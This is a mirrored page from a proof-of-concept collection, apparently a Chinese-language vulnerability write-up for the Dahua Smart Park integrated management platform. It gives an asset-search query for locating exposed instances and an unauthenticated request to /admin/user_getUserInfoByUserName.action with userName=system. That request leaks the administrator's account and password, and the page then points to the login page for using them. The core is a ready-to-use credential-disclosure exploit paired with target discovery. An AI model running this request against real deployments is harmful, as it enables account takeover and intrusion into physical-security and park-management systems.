admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-08 12:25:11 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/网络设备漏洞/大华 智慧园区综合管理平台 user_getUserInfoByUserName.action 账号密码泄漏漏洞.md
Threekiii 11de4c1d47 update
2024-11-06 14:10:36 +08:00

35 lines
739 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 大华 智慧园区综合管理平台 user_getUserInfoByUserName.action 账号密码泄漏漏洞
## 漏洞描述
大华 智慧园区综合管理平台 user_getUserInfoByUserName.action 中存在API接口导致管理园账号密码泄漏
## 漏洞影响
智慧园区综合管理平台
## 网络测绘
```
app="dahua-智慧园区综合管理平台"
```
## 漏洞复现
![image-20230828144644472](images/image-20230828144644472.png)
请求POC
```
/admin/user_getUserInfoByUserName.action?userName=system
```
![image-20230828144658624](images/image-20230828144658624.png)
获取后访问地址
```
/admin/login_login.action
```
![image-20230828144732646](images/image-20230828144732646.png)
Reference in New Issue View Git Blame Copy Permalink